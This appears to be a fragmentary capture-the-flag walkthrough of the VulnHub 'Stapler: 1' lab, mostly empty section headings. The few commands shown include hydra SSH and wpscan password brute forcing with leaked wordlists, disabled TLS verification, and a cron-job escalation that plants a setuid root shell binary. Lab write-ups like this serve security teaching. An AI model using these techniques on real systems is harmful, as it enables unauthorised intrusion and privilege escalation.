VulnHub — Stapler: 1


Victim Description:

Information Gathering:

nmap -sn -n

FTP Enumeration:

Truncated passwd file

SSH Enumeration:

hydra -L sshusers -P /pentest/password-recovery/SecLists/Passwords/darkc0de.txt -e nsr ssh

SMB Enumeration:

Port 666 Enumeration:

Web Enumeration:

sudo wpscan --url --enumerate u,ap --disable-tls-checks --log /home/ptester/Stapler/wpscan_41.txt

WPScan: Plugins
WPScan: Enumerated Users
WPScan: Enumerated Users 10–20

WordPress Exploit:

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

MySQL Enumeration:

WordPress Brute Force:

sudo wpscan --url --disable-tls-checks --usernames /home/ptester/Stapler/wp_users.txt --wordlist /pentest/password-recovery/dictionary/Passwords/Leaked-Databases/rockyou.txt --log /home/ptester/Stapler/wp_creds.txt

Remote Shell:

Method 1 — WordPress Plugin:

Method 2 — MySQL, SELECT Statement:

Local Information Gathering and Enumeration:

Privilege Escalation:

Method 1 — Stored Password:

Method 2 — Kernel Exploit:

wget on Stapler
SimpleHTTPServer on second attacking system

Method 3 — Cron Job:

echo 'int main(void)
{
execl("/bin/sh", "sh", 0);
}' > rootpriv.c

echo 'chown root:root /tmp/rootpriv; chmod u+s /tmp/rootpriv;' > /usr/local/sbin/





Cyber Security Enthusiast

Mike Bond